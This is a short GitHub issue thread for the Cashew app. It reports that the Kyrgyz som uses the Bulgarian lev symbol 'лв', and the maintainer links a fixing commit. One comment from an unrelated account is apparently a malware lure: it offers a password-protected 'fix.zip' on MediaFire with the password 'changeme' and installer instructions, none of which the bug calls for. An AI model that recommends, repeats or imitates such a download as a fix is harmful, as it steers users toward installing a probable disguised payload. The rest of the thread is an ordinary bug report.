### ISSUE TITLE
[Bug] Incorrect symbol for KGS currency

### ISSUE THREAD

**Issue by sultanaliev-s** [jameskokoska/Cashew#395]
**Describe the bug**
The symbol for Kyrgyz som is set to "лв" which is the symbol for Bulgarian lev. The actual Kyrgyz som symbol is ⃀ (U+20C0). However that unicode is not supported on my and my friends' devices, so I suggest using "с" (Cyrillic Es) instead, until the som symbol is not supported widely.  
I've found the declaration of "лв" for KGS in /budget/assets/static/currenciesInfo.json on line 411.

**How to reproduce**
1) Go to Accounts
2) Create new
3) Choose KGS as the currency

**Screenshots/videos**
![изображение](https://github.com/user-attachments/assets/d56b13ea-1dde-425e-b5a7-fa4342ee71d3)

**Details**
 - Device: Pixel 6a
 - App Version: v5.4.0+413

**Additional notes**
https://en.wikipedia.org/wiki/Kyrgyz_som
I would like it if you could point out where you found this file, so I could address this issue more widely. I have seen such bug on some sites, but forgot on which exactly(

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jameskokoska** [comment]
Fixed here: https://github.com/jameskokoska/Cashew/commit/caf7fb57a2f9ff67f6f1d7f4e8f3c216cd011932

**Comment by sultanaliev-s** [comment]
Thank you!
